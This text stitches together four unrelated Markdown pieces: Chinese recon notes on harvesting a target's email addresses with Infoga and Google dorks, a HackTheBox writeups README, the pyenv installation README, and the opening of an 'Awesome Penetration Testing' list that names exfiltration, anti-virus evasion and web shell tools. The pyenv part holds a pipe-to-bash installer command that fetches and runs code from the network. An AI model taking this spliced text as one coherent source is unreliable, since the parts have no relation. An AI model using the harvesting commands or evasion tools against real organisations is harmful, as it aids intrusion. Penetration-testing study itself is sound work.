Infoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区...)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。
- 安装
```
git clone https://github.com/m4ll0k/Infoga.git /data/infoga
cd /data/infoga
pip3 install requests
python3 infoga.py
```
- 使用
```
python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p'
python3 infoga.py --info emailtest@site.com
python3 infoga.py --info emailtest@site.com -b
```
### Google Hacking
```
site:target.com intext:@target.com
site:target.com 邮件
site:target.com email
```
![](img/1594459-20200119161412993-1570311002.png)
# 历史漏洞&资产
很多时候去查看目标的历史漏洞和资产信息,往往能够得到很多有价值的信息。
- 乌云漏洞库
平台地址:`https://github.com/hanc00l/wooyun_public`
- Exploit-db
平台地址:`https://www.exploit-db.com/`
- Securityfocus
平台地址:`https://www.securityfocus.com/bid`
- Cxsecurity
平台地址:`https://cxsecurity.com/exploit/`
- 国家信息安全漏洞库
平台地址:`http://www.cnnvd.org.cn/`
- Seebug
平台地址:`https://www.seebug.org/`
等。。。
|
# HackTheBox Writeups
I have been trying to give back to the community by drafting writeup reports for the machines I've completed on Hack the Box, a website for practising ethical hacking.
## Beginner-Friendly All The Way
I pitch every report for a 'beginner', regardless of the difficulty of the machine. I've made this choice as I consider writeups to be a great learning resource for people trying to get started in the area. I am always available for for a chat when it comes to cyber, and especially ethical hacking for beginners.
## Preparing for the OSCP ?
If you're using Hack the Box to prepare for your OSCP exam, you'll be pleased to know most of my writeups adhere to the rules of the OSCP exam (i.e no use of metasploit, sqlmap etc).
I'd also recommend you read my 'OSCP Lab & Exam Review and Tips'. It was originally on Reddit, but I have created a copy you can find in this repo.
## Retired Machines
Retired machines are free to peruse in their own folder above, with no password. Download the PDF, as it renders slowly and weirdly on the Github viewer.
## Active Machines
Active machines are downloadable PDFs, locked with passwords. Click on the PDF you want and download it to your computer.
With each active box, I state the required password (below) you will need to unlock it when prompted after you open it on your computer, so please keep an eye out for this.
|
# Simple Python Version Management: pyenv
[![Join the chat at https://gitter.im/yyuu/pyenv](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/yyuu/pyenv?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
pyenv lets you easily switch between multiple versions of Python. It's
simple, unobtrusive, and follows the UNIX tradition of single-purpose
tools that do one thing well.
This project was forked from [rbenv](https://github.com/rbenv/rbenv) and
[ruby-build](https://github.com/rbenv/ruby-build), and modified for Python.
![Terminal output example](/terminal_output.png)
### What pyenv _does..._
* Lets you **change the global Python version** on a per-user basis.
* Provides support for **per-project Python versions**.
* Allows you to **override the Python version** with an environment
variable.
* Searches for commands from **multiple versions of Python at a time**.
This may be helpful to test across Python versions with [tox](https://pypi.python.org/pypi/tox).
### In contrast with pythonbrew and pythonz, pyenv _does not..._
* **Depend on Python itself.** pyenv was made from pure shell scripts.
There is no bootstrap problem of Python.
* **Need to be loaded into your shell.** Instead, pyenv's shim
approach works by adding a directory to your `PATH`.
* **Manage virtualenv.** Of course, you can create [virtualenv](https://pypi.python.org/pypi/virtualenv)
yourself, or [pyenv-virtualenv](https://github.com/pyenv/pyenv-virtualenv)
to automate the process.
----
## Table of Contents
* **[How It Works](#how-it-works)**
* [Understanding PATH](#understanding-path)
* [Understanding Shims](#understanding-shims)
* [Understanding Python version selection](#understanding-python-version-selection)
* [Locating Pyenv-provided Python Installations](#locating-pyenv-provided-python-installations)
* **[Installation](#installation)**
* [Getting Pyenv](#getting-pyenv)
* [UNIX/MacOS](#unixmacos)
* [Homebrew in macOS](#homebrew-in-macos)
* [Automatic installer](#automatic-installer)
* [Basic GitHub Checkout](#basic-github-checkout)
* [Windows](#windows)
* [Set up your shell environment for Pyenv](#set-up-your-shell-environment-for-pyenv)
* [Restart your shell](#restart-your-shell)
* [Install Python build dependencies](#install-python-build-dependencies)
* **[Usage](#usage)**
* [Install additional Python versions](#install-additional-python-versions)
* [Prefix auto-resolution to the latest version](#prefix-auto-resolution-to-the-latest-version)
* [Python versions with extended support](#python-versions-with-extended-support)
* [Switch between Python versions](#switch-between-python-versions)
* [Uninstall Python versions](#uninstall-python-versions)
* [Other operations](#other-operations)
* [Upgrading](#upgrading)
* [Upgrading with Homebrew](#upgrading-with-homebrew)
* [Upgrading with Installer or Git checkout](#upgrading-with-installer-or-git-checkout)
* [Uninstalling pyenv](#uninstalling-pyenv)
* [Pyenv plugins](#pyenv-plugins)
* [Advanced Configuration](#advanced-configuration)
* [Using Pyenv without shims](#using-pyenv-without-shims)
* [Environment variables](#environment-variables)
* **[Development](#development)**
* [Contributing](#contributing)
* [Version History](#version-history)
* [License](#license)
----
## How It Works
At a high level, pyenv intercepts Python commands using shim
executables injected into your `PATH`, determines which Python version
has been specified by your application, and passes your commands along
to the correct Python installation.
### Understanding PATH
When you run a command like `python` or `pip`, your operating system
searches through a list of directories to find an executable file with
that name. This list of directories lives in an environment variable
called `PATH`, with each directory in the list separated by a colon:
/usr/local/bin:/usr/bin:/bin
Directories in `PATH` are searched from left to right, so a matching
executable in a directory at the beginning of the list takes
precedence over another one at the end. In this example, the
`/usr/local/bin` directory will be searched first, then `/usr/bin`,
then `/bin`.
### Understanding Shims
pyenv works by inserting a directory of _shims_ at the front of your
`PATH`:
$(pyenv root)/shims:/usr/local/bin:/usr/bin:/bin
Through a process called _rehashing_, pyenv maintains shims in that
directory to match every Python command across every installed version
of Python—`python`, `pip`, and so on.
Shims are lightweight executables that simply pass your command along
to pyenv. So with pyenv installed, when you run, say, `pip`, your
operating system will do the following:
* Search your `PATH` for an executable file named `pip`
* Find the pyenv shim named `pip` at the beginning of your `PATH`
* Run the shim named `pip`, which in turn passes the command along to
pyenv
### Understanding Python version selection
When you execute a shim, pyenv determines which Python version to use by
reading it from the following sources, in this order:
1. The `PYENV_VERSION` environment variable (if specified). You can use
the [`pyenv shell`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-shell) command to set this environment
variable in your current shell session.
2. The application-specific `.python-version` file in the current
directory (if present). You can modify the current directory's
`.python-version` file with the [`pyenv local`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-local)
command.
3. The first `.python-version` file found (if any) by searching each parent
directory, until reaching the root of your filesystem.
4. The global `$(pyenv root)/version` file. You can modify this file using
the [`pyenv global`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-global) command.
If the global version file is not present, pyenv assumes you want to use the "system"
Python (see below).
A special version name "`system`" means to use whatever Python is found on `PATH`
after the shims `PATH` entry (in other words, whatever would be run if Pyenv
shims weren't on `PATH`). Note that Pyenv considers those installations outside
its control and does not attempt to inspect or distinguish them in any way.
So e.g. if you are on MacOS and have OS-bundled Python 3.8.9 and Homebrew-installed
Python 3.9.12 and 3.10.2 -- for Pyenv, this is still a single "`system`" version,
and whichever of those is first on `PATH` under the executable name you
specified will be run.
**NOTE:** You can activate multiple versions at the same time, including multiple
versions of Python2 or Python3 simultaneously. This allows for parallel usage of
Python2 and Python3, and is required with tools like `tox`. For example, to instruct
Pyenv to first use your system Python and Python3 (which are e.g. 2.7.9 and 3.4.2)
but also have Python 3.3.6, 3.2.1, and 2.5.2 available, you first `pyenv install`
the missing versions, then set `pyenv global system 3.3.6 3.2.1 2.5.2`.
Then you'll be able to invoke any of those versions with an appropriate `pythonX` or
`pythonX.Y` name.
You can also specify multiple versions in a `.python-version` file by hand,
separated by newlines. Lines starting with a `#` are ignored.
[`pyenv which <command>`](COMMANDS.md#pyenv-which) displays which real executable would be
run when you invoke `<command>` via a shim.
E.g. if you have 3.3.6, 3.2.1 and 2.5.2 installed of which 3.3.6 and 2.5.2 are selected
and your system Python is 3.2.5,
`pyenv which python2.5` should display `$(pyenv root)/versions/2.5.2/bin/python2.5`,
`pyenv which python3` -- `$(pyenv root)/versions/3.3.6/bin/python3` and
`pyenv which python3.2` -- path to your system Python due to the fall-through (see below).
Shims also fall through to anything further on `PATH` if the corresponding executable is
not present in any of the selected Python installations.
This allows you to use any programs installed elsewhere on the system as long as
they are not shadowed by a selected Python installation.
### Locating Pyenv-provided Python installations
Once pyenv has determined which version of Python your application has
specified, it passes the command along to the corresponding Python
installation.
Each Python version is installed into its own directory under
`$(pyenv root)/versions`.
For example, you might have these versions installed:
* `$(pyenv root)/versions/2.7.8/`
* `$(pyenv root)/versions/3.4.2/`
* `$(pyenv root)/versions/pypy-2.4.0/`
As far as Pyenv is concerned, version names are simply directories under
`$(pyenv root)/versions`.
----
## Installation
### Getting Pyenv
#### UNIX/MacOS
##### Homebrew in macOS
1. Consider installing with [Homebrew](https://brew.sh):
```sh
brew update
brew install pyenv
```
2. Then follow the rest of the post-installation steps, starting with
[Set up your shell environment for Pyenv](#set-up-your-shell-environment-for-pyenv).
3. OPTIONAL. To fix `brew doctor`'s warning _""config" scripts exist outside your system or Homebrew directories"_
If you're going to build Homebrew formulae from source that link against Python
like Tkinter or NumPy
_(This is only generally the case if you are a developer of such a formula,
or if you have an EOL version of MacOS for which prebuilt bottles are no longer provided
and you are using such a formula)._
To avoid them accidentally linking against a Pyenv-provided Python,
add the following line into your interactive shell's configuration:
* Bash/Zsh:
~~~bash
alias brew='env PATH="${PATH//$(pyenv root)\/shims:/}" brew'
~~~
* Fish:
~~~fish
alias brew="env PATH=(string replace (pyenv root)/shims '' \"\$PATH\") brew"
~~~
##### Automatic installer
`curl https://pyenv.run | bash`
For more details visit our other project:
https://github.com/pyenv/pyenv-installer
##### Basic GitHub Checkout
This will get you going with the latest version of Pyenv and make it
easy to fork and contribute any changes back upstream.
* **Check out Pyenv where you want it installed.**
A good place to choose is `$HOME/.pyenv` (but you can install it somewhere else):
```
git clone https://github.com/pyenv/pyenv.git ~/.pyenv
```
* Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't
worry if it fails; Pyenv will still work normally:
```
cd ~/.pyenv && src/configure && make -C src
```
#### Windows
Pyenv does not officially support Windows and does not work in Windows outside
the Windows Subsystem for Linux.
Moreover, even there, the Pythons it installs are not native Windows versions
but rather Linux versions running in a virtual machine --
so you won't get Windows-specific functionality.
If you're in Windows, we recommend using @kirankotari's [`pyenv-win`](https://github.com/pyenv-win/pyenv-win) fork --
which does install native Windows Python versions.
### Set up your shell environment for Pyenv
**Upgrade note:** The startup logic and instructions have been updated for simplicity in 2.3.0.
The previous, more complicated configuration scheme for 2.0.0-2.2.5 still works.
* Define environment variable `PYENV_ROOT` to point to the path where
Pyenv will store its data. `$HOME/.pyenv` is the default.
If you installed Pyenv via Git checkout, we recommend
to set it to the same location as where you cloned it.
* Add the `pyenv` executable to your `PATH` if it's not already there
* run `eval "$(pyenv init -)"` to install `pyenv` into your shell as a shell function, enable shims and autocompletion
* You may run `eval "$(pyenv init --path)"` instead to just enable shims, without shell integration
The below setup should work for the vast majority of users for common use cases.
See [Advanced configuration](#advanced-configuration) for details and more configuration options.
- For **bash**:
Stock Bash startup files vary widely between distributions in which of them source
which, under what circumstances, in what order and what additional configuration they perform.
As such, the most reliable way to get Pyenv in all environments is to append Pyenv
configuration commands to both `.bashrc` (for interactive shells)
and the profile file that Bash would use (for login shells).
First, add the commands to `~/.bashrc` by running the following in your terminal:
~~~ bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
~~~
Then, if you have `~/.profile`, `~/.bash_profile` or `~/.bash_login`, add the commands there as well.
If you have none of these, add them to `~/.profile`.
* to add to `~/.profile`:
~~~ bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.profile
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.profile
echo 'eval "$(pyenv init -)"' >> ~/.profile
~~~
* to add to `~/.bash_profile`:
~~~ bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bash_profile
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bash_profile
echo 'eval "$(pyenv init -)"' >> ~/.bash_profile
~~~
- For **Zsh**:
~~~ zsh
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc
echo 'eval "$(pyenv init -)"' >> ~/.zshrc
~~~
If you wish to get Pyenv in noninteractive login shells as well, also add the commands to `~/.zprofile` or `~/.zlogin`.
- For **Fish shell**:
If you have Fish 3.2.0 or newer, execute this interactively:
~~~ fish
set -Ux PYENV_ROOT $HOME/.pyenv
fish_add_path $PYENV_ROOT/bin
~~~
Otherwise, execute the snippet below:
~~~ fish
set -Ux PYENV_ROOT $HOME/.pyenv
set -U fish_user_paths $PYENV_ROOT/bin $fish_user_paths
~~~
Now, add this to `~/.config/fish/config.fish`:
~~~ fish
pyenv init - | source
~~~
**Bash warning**: There are some systems where the `BASH_ENV` variable is configured
to point to `.bashrc`. On such systems, you should almost certainly put the
`eval "$(pyenv init -)"` line into `.bash_profile`, and **not** into `.bashrc`. Otherwise, you
may observe strange behaviour, such as `pyenv` getting into an infinite loop.
See [#264](https://github.com/pyenv/pyenv/issues/264) for details.
**Proxy note**: If you use a proxy, export `http_proxy` and `https_proxy`, too.
In MacOS, you might also want to install [Fig](https://fig.io/) which
provides alternative shell completions for many command line tools with an
IDE-like popup interface in the terminal window.
(Note that their completions are independent from Pyenv's codebase
so they might be slightly out of sync for bleeding-edge interface changes.)
### Restart your shell
for the `PATH` changes to take effect.
```sh
exec "$SHELL"
```
### Install Python build dependencies
[**Install Python build dependencies**](https://github.com/pyenv/pyenv/wiki#suggested-build-environment)
before attempting to install a new Python version.
You can now begin using Pyenv.
----
## Usage
### Install additional Python versions
To install additional Python versions, use [`pyenv install`](COMMANDS.md#pyenv-install).
For example, to download and install Python 3.10.4, run:
```sh
pyenv install 3.10.4
```
Running `pyenv install -l` gives the list of all available versions.
**NOTE:** Most Pyenv-provided Python releases are source releases and are built
from source as part of installation (that's why you need Python build dependencies preinstalled).
You can pass options to Python's `configure` and compiler flags to customize the build,
see [_Special environment variables_ in Python-Build's README](plugins/python-build/README.md#special-environment-variables)
for details.
**NOTE:** If you are having trouble installing a Python version,
please visit the wiki page about
[Common Build Problems](https://github.com/pyenv/pyenv/wiki/Common-build-problems).
**NOTE:** If you want to use proxy for download, please set the `http_proxy` and `https_proxy`
environment variables.
**NOTE:** If you'd like a faster interpreter at the cost of longer build times,
see [_Building for maximum performance_ in Python-Build's README](plugins/python-build/README.md#building-for-maximum-performance).
#### Prefix auto-resolution to the latest version
All Pyenv subcommands except `uninstall` automatically resolve full prefixes to the latest version in the corresponding version line.
`pyenv install` picks the latest known version, while other subcommands pick the latest installed version.
E.g. to install and then switch to the latest 3.10 release:
```sh
pyenv install 3.10
pyenv global 3.10
```
You can run [`pyenv latest -k <prefix>`](COMMANDS.md#pyenv-latest) to see how `pyenv install` would resolve a specific prefix, or [`pyenv latest <prefix>`](COMMANDS.md#pyenv-latest) to see how other subcommands would resolve it.
See the [`pyenv latest` documentation](COMMANDS.md#pyenv-latest) for details.
#### Python versions with extended support
For the following Python releases, Pyenv applies user-provided patches that add support for some newer environments.
Though we don't actively maintain those patches, since existing releases never change,
it's safe to assume that they will continue working until there are further incompatible changes
in a later version of those environments.
* *3.7.8-3.7.15, 3.8.4-3.8.12, 3.9.0-3.9.7* : XCode 13.3
* *3.5.10, 3.6.15* : MacOS 11+ and XCode 13.3
* *2.7.18* : MacOS 10.15+ and Apple Silicon
### Switch between Python versions
To select a Pyenv-installed Python as the version to use, run one
of the following commands:
* [`pyenv shell <version>`](COMMANDS.md#pyenv-shell) -- select just for current shell session
* [`pyenv local <version>`](COMMANDS.md#pyenv-local) -- automatically select whenever you are in the current directory (or its subdirectories)
* [`pyenv global <version>`](COMMANDS.md#pyenv-shell) -- select globally for your user account
E.g. to select the above-mentioned newly-installed Python 3.10.4 as your preferred version to use:
~~~bash
pyenv global 3.10.4
~~~
Now whenever you invoke `python`, `pip` etc., an executable from the Pyenv-provided
3.10.4 installation will be run instead of the system Python.
Using "`system`" as a version name would reset the selection to your system-provided Python.
See [Understanding shims](#understanding-shims) and
[Understanding Python version selection](#understanding-python-version-selection)
for more details on how the selection works and more information on its usage.
### Uninstall Python versions
As time goes on, you will accumulate Python versions in your
`$(pyenv root)/versions` directory.
To remove old Python versions, use [`pyenv uninstall <versions>`](COMMANDS.md#pyenv-uninstall).
Alternatively, you can simply `rm -rf` the directory of the version you want
to remove. You can find the directory of a particular Python version
with the `pyenv prefix` command, e.g. `pyenv prefix 2.6.8`.
Note however that plugins may run additional operations on uninstall
which you would need to do by hand as well. E.g. Pyenv-Virtualenv also
removes any virtual environments linked to the version being uninstalled.
### Other operations
Run `pyenv commands` to get a list of all available subcommands.
Run a subcommand with `--help` to get help on it, or see the [Commands Reference](COMMANDS.md).
Note that Pyenv plugins that you install may add their own subcommands.
## Upgrading
### Upgrading with Homebrew
If you've installed Pyenv using Homebrew, upgrade using:
```sh
brew upgrade pyenv
```
To switch from a release to the latest development version of Pyenv, use:
```sh
brew uninstall pyenv
brew install pyenv --head
```
then you can upgrade it with `brew upgrade pyenv` as usual.
### Upgrading with Installer or Git checkout
If you've installed Pyenv with Pyenv-installer, you likely have the
[Pyenv-Update](https://github.com/pyenv/pyenv-update) plugin that would
upgrade Pyenv and all installed plugins:
```sh
pyenv update
```
If you've installed Pyenv using Pyenv-installer or Git checkout, you can also
upgrade your installation at any time using Git.
To upgrade to the latest development version of pyenv, use `git pull`:
```sh
cd $(pyenv root)
git pull
```
To upgrade to a specific release of Pyenv, check out the corresponding tag:
```sh
cd $(pyenv root)
git fetch
git tag
git checkout v0.1.0
```
## Uninstalling pyenv
The simplicity of pyenv makes it easy to temporarily disable it, or
uninstall from the system.
1. To **disable** Pyenv managing your Python versions, simply remove the
`pyenv init` invocations from your shell startup configuration. This will
remove Pyenv shims directory from `PATH`, and future invocations like
`python` will execute the system Python version, as it was before Pyenv.
`pyenv` will still be accessible on the command line, but your Python
apps won't be affected by version switching.
2. To completely **uninstall** Pyenv, remove _all_ Pyenv configuration lines
from your shell startup configuration, and then remove
its root directory. This will **delete all Python versions** that were
installed under the `` $(pyenv root)/versions/ `` directory:
```sh
rm -rf $(pyenv root)
```
If you've installed Pyenv using a package manager, as a final step,
perform the Pyenv package removal. For instance, for Homebrew:
```
brew uninstall pyenv
```
## Pyenv plugins
Pyenv provides a simple, flexible and maintainable way to extend and customize its functionalty with plugins --
as simple as creating a plugin directory and dropping a shell script on a certain subpath of it
with whatever extra logic you need to be run at certain moments.
See [_Plugins_ on the wiki](https://github.com/pyenv/pyenv/wiki/Plugins) on how to install and use plugins
as well as a catalog of some useful existing plugins for common needs.
See [_Authoring plugins_ on the wiki](https://github.com/pyenv/pyenv/wiki/Authoring-plugins) on writing your own plugins.
## Advanced Configuration
Skip this section unless you must know what every line in your shell
profile is doing.
Also see the [Environment variables](#environment-variables) section
for the environment variables that control Pyenv's behavior.
`pyenv init` is the only command that crosses the line of loading
extra commands into your shell. Coming from RVM, some of you might be
opposed to this idea. Here's what `eval "$(pyenv init -)"` actually does:
1. **Sets up the shims path.** This is what allows Pyenv to intercept
and redirect invocations of `python`, `pip` etc. transparently.
It prepends `$(pyenv root)/shims` to your `$PATH`.
It also deletes any other instances of `$(pyenv root)/shims` on `PATH`
which allows to invoke `eval "$(pyenv init -)"` multiple times without
getting duplicate `PATH` entries.
2. **Installs autocompletion.** This is entirely optional but pretty
useful. Sourcing `$(pyenv root)/completions/pyenv.bash` will set that
up. There are also completions for Zsh and Fish.
3. **Rehashes shims.** From time to time you'll need to rebuild your
shim files. Doing this on init makes sure everything is up to
date. You can always run `pyenv rehash` manually.
4. **Installs `pyenv` into the current shell as a shell function.**
This bit is also optional, but allows
pyenv and plugins to change variables in your current shell.
This is required for some commands like `pyenv shell` to work.
The sh dispatcher doesn't do
anything crazy like override `cd` or hack your shell prompt, but if
for some reason you need `pyenv` to be a real script rather than a
shell function, you can safely skip it.
`eval "$(pyenv init --path)"` only does items 1 and 3.
To see exactly what happens under the hood for yourself, run `pyenv init -`
or `pyenv init --path`.
`eval "$(pyenv init -)"` is supposed to run at any interactive shell's
startup (including nested shells -- e.g. those invoked from editors)
so that you get completion and convenience shell functions.
`eval "$(pyenv init --path)"` can be used instead of `eval "$(pyenv init -)"`
to just enable shims, without shell integration. It can also be used to bump shims
to the front of `PATH` after some other logic has prepended stuff to `PATH`
that may shadow Pyenv's shims.
* In particular, in Debian-based distributions, the stock `~/.profile`
prepends per-user `bin` directories to `PATH` after having sourced `~/.bashrc`.
This necessitates appending a `pyenv init` call to `~/.profile` as well as `~/.bashrc`
in these distributions because the system's Pip places executables for
modules installed by a non-root user into those per-user `bin` directories.
### Using Pyenv without shims
If you don't want to use `pyenv init` and shims, you can still benefit
from pyenv's ability to install Python versions for you. Just run
`pyenv install` and you will find versions installed in
`$(pyenv root)/versions`.
You can manually execute or symlink them as required,
or you can use [`pyenv exec <command>`](COMMANDS.md#pyenv-exec)
whenever you want `<command>` to be affected by Pyenv's version selection
as currently configured.
`pyenv exec` works by prepending `$(pyenv root)/versions/<selected version>/bin`
to `PATH` in the `<command>`'s environment, the same as what e.g. RVM does.
### Environment variables
You can affect how Pyenv operates with the following environment variables:
name | default | description
-----|---------|------------
`PYENV_VERSION` | | Specifies the Python version to be used.<br>Also see [`pyenv shell`](COMMANDS.md#pyenv-shell)
`PYENV_ROOT` | `~/.pyenv` | Defines the directory under which Python versions and shims reside.<br>Also see [`pyenv root`](COMMANDS.md#pyenv-root)
`PYENV_DEBUG` | | Outputs debug information.<br>Also as: `pyenv --debug <subcommand>`
`PYENV_HOOK_PATH` | [_see wiki_][hooks] | Colon-separated list of paths searched for pyenv hooks.
`PYENV_DIR` | `$PWD` | Directory to start searching for `.python-version` files.
`PYTHON_BUILD_ARIA2_OPTS` | | Used to pass additional parameters to [`aria2`](https://aria2.github.io/).<br>If the `aria2c` binary is available on `PATH`, pyenv uses `aria2c` instead of `curl` or `wget` to download the Python Source code. If you have an unstable internet connection, you can use this variable to instruct `aria2` to accelerate the download.<br>In most cases, you will only need to use `-x 10 -k 1M` as value to `PYTHON_BUILD_ARIA2_OPTS` environment variable
See also [_Special environment variables_ in Python-Build's README](plugins/python-build/README.md#special-environment-variables)
for environment variables that can be used to customize the build.
----
## Development
The pyenv source code is [hosted on
GitHub](https://github.com/pyenv/pyenv). It's clean, modular,
and easy to understand, even if you're not a shell hacker.
Tests are executed using [Bats](https://github.com/bats-core/bats-core):
bats test
bats/test/<file>.bats
### Contributing
Feel free to submit pull requests and file bugs on the [issue
tracker](https://github.com/pyenv/pyenv/issues).
See [CONTRIBUTING.md](CONTRIBUTING.md) for more details on submitting changes.
### Version History
See [CHANGELOG.md](CHANGELOG.md).
### License
[The MIT License](LICENSE)
[pyenv-virtualenv]: https://github.com/pyenv/pyenv-virtualenv#readme
[hooks]: https://github.com/pyenv/pyenv/wiki/Authoring-plugins#pyenv-hooks
|
# Awesome Penetration Testing [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
> A collection of awesome penetration testing and offensive cybersecurity resources.
[Penetration testing](https://en.wikipedia.org/wiki/Penetration_test) is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Should you discover a vulnerability, please follow [this guidance](https://kb.cert.org/vuls/guidance/) to report it responsibly.
Your contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
[This project is supported by Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_content=awesome+penetration+testing&utm_medium=referral&utm_campaign=generic+advert)
## Contents
* [Android Utilities](#android-utilities)
* [Anonymity Tools](#anonymity-tools)
* [Tor Tools](#tor-tools)
* [Anti-virus Evasion Tools](#anti-virus-evasion-tools)
* [Books](#books)
* [Malware Analysis Books](#malware-analysis-books)
* [CTF Tools](#ctf-tools)
* [Cloud Platform Attack Tools](#cloud-platform-attack-tools)
* [Collaboration Tools](#collaboration-tools)
* [Conferences and Events](#conferences-and-events)
* [Asia](#asia)
* [Europe](#europe)
* [North America](#north-america)
* [South America](#south-america)
* [Zealandia](#zealandia)
* [Exfiltration Tools](#exfiltration-tools)
* [Exploit Development Tools](#exploit-development-tools)
* [File Format Analysis Tools](#file-format-analysis-tools)
* [GNU/Linux Utilities](#gnulinux-utilities)
* [Hash Cracking Tools](#hash-cracking-tools)
* [Hex Editors](#hex-editors)
* [Industrial Control and SCADA Systems](#industrial-control-and-scada-systems)
* [Intentionally Vulnerable Systems](#intentionally-vulnerable-systems)
* [Intentionally Vulnerable Systems as Docker Containers](#intentionally-vulnerable-systems-as-docker-containers)
* [Lock Picking](#lock-picking)
* [macOS Utilities](#macos-utilities)
* [Multi-paradigm Frameworks](#multi-paradigm-frameworks)
* [Network Tools](#network-tools)
* [DDoS Tools](#ddos-tools)
* [Network Reconnaissance Tools](#network-reconnaissance-tools)
* [Protocol Analyzers and Sniffers](#protocol-analyzers-and-sniffers)
* [Network Traffic Replay and Editing Tools](#network-traffic-replay-and-editing-tools)
* [Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)
* [Transport Layer Security Tools](#transport-layer-security-tools)
* [Wireless Network Tools](#wireless-network-tools)
* [Network Vulnerability Scanners](#network-vulnerability-scanners)
* [Web Vulnerability Scanners](#web-vulnerability-scanners)
* [Open Sources Intelligence (OSINT)](#open-sources-intelligence-osint)
* [Data broker and search engine services](#data-broker-and-search-engine-services)
* [Dorking tools](#dorking-tools)
* [Email search and analysis tools](#email-search-and-analysis-tools)
* [Metadata harvesting and analysis](#metadata-harvesting-and-analysis)
* [Network device discovery tools](#network-device-discovery-tools)
* [OSINT Online Resources](#osint-online-resources)
* [Source code repository searching tools](#source-code-repository-searching-tools)
* [Web application and resource analysis tools](#web-application-and-resource-analysis-tools)
* [Online Resources](#online-resources)
* [Online Code Samples and Examples](#online-code-samples-and-examples)
* [Online Exploit Development Resources](#online-exploit-development-resources)
* [Online Lock Picking Resources](#online-lock-picking-resources)
* [Online Operating Systems Resources](#online-operating-systems-resources)
* [Online Penetration Testing Resources](#online-penetration-testing-resources)
* [Other Lists Online](#other-lists-online)
* [Penetration Testing Report Templates](#penetration-testing-report-templates)
* [Operating System Distributions](#operating-system-distributions)
* [Periodicals](#periodicals)
* [Physical Access Tools](#physical-access-tools)
* [Privilege Escalation Tools](#privilege-escalation-tools)
* [Password Spraying Tools](#password-spraying-tools)
* [Reverse Engineering](#reverse-engineering)
* [Reverse Engineering Books](#reverse-engineering-books)
* [Reverse Engineering Tools](#reverse-engineering-tools)
* [Security Education Courses](#security-education-courses)
* [Shellcoding Guides and Tutorials](#exploit-development-online-resources)
* [Side-channel Tools](#side-channel-tools)
* [Social Engineering](#social-engineering)
* [Social Engineering Books](#social-engineering-books)
* [Social Engineering Online Resources](#social-engineering-online-resources)
* [Social Engineering Tools](#social-engineering-tools)
* [Static Analyzers](#static-analyzers)
* [Steganography Tools](#steganography-tools)
* [Vulnerability Databases](#vulnerability-databases)
* [Web Exploitation](#web-exploitation)
* [Intercepting Web proxies](#intercepting-web-proxies)
* [Web file inclusion tools](#web-file-inclusion-tools)
* [Web injection tools](#web-injection-tools)
* [Web path discovery and bruteforcing tools](#web-path-discovery-and-bruteforcing-tools)
* [Web shells and C2 frameworks](#web-shells-and-c2-frameworks)
* [Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)
* [Web Exploitation Books](#web-exploitation-books)
* [Windows Utilities](#windows-utilities)
## Android Utilities
* [cSploit](https://www.csploit.org/) - Advanced IT security professional toolkit on Android featuring an integrated Metasploit daemon and MITM capabilities.
* [Fing](https://www.fing.com/products/fing-app/) - Network scanning and host enumeration app that performs NetBIOS, UPnP, Bonjour, SNMP, and various other advanced device fingerprinting techniques.
## Anonymity Tools
* [I2P](https://geti2p.net/) - The Invisible Internet Project.
* [Metadata Anonymization Toolkit (MAT)](https://0xacab.org/jvoisin/mat2) - Metadata removal tool, supporting a wide range of commonly used file formats, written in Python3.
* [What Every Browser Knows About You](http://webkay.robinlinus.com/) - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.
### Tor Tools
See also [awesome-tor](https://github.com/ajvb/awesome-tor).
* [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network.
* [OnionScan](https://onionscan.org/) - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
* [Tails](https://tails.boum.org/) - Live operating system aiming to preserve your privacy and anonymity.
* [Tor](https://www.torproject.org/) - Free software and onion routed overlay network that helps you defend against traffic analysis.
* [dos-over-tor](https://github.com/skizap/dos-over-tor) - Proof of concept denial of service over Tor stress test tool.
* [kalitorify](https://github.com/brainfuckSec/kalitorify) - Transparent proxy through Tor for Kali Linux OS.
## Anti-virus Evasion Tools
* [AntiVirus Evasion Tool (AVET)](https://github.com/govolution/avet) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
* [CarbonCopy](https://github.com/paranoidninja/CarbonCopy) - Tool that creates a spoofed certificate of any online website and signs an Executable for AV evasion.
* [Hyperion](http://nullsecurity.net/tools/binary.html) - Runtime encryptor for 32-bit portable executables ("PE `.exe`s").
